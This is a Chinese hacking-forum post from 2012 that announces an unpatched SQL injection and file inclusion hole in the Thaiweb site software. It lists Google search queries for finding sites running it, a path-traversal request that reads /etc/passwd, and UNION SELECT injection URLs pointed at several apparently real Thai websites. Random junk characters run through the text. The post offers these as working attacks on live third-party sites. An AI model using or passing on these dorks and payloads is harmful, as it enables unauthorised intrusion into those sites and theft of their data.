找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2181|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:, U# y- q0 e6 x# r% _4 d

" K' q( [2 N4 f' l* Eintext:powered by Thaiweb
  d& M3 a; V9 V/ q# l, v3 k$ ^, v# @7 _3 T2 q6 H
inurl:index.php?page=board.php
  |% q- D3 w; `$ C6 e# P' {, v* u- a

& y- `0 ?7 r- f# h4 S, `) R1 d- P' F% e* y) t. L& U
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
7 \+ Z; J. `6 B* g( w$ P' v' z* i- W/ M

8 N9 i7 _3 Y& s3 j+ a1 F0 ~1 K, s5 z; W: a
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
0 r& c0 o) G% s+ t- y9 K0 i( c& [8 h- `" K2 k) p
! T: D5 v8 e+ ]' q5 A# T
3 n# a5 W! u. t6 W% g9 Z9 |
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# i" I1 X: P8 g- V. r; j
7 C) m3 q2 f4 V; shttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--3 Z- I" V5 T$ a/ d

! O( F! \' F5 Y6 Shttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
! B4 k- q9 c- O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表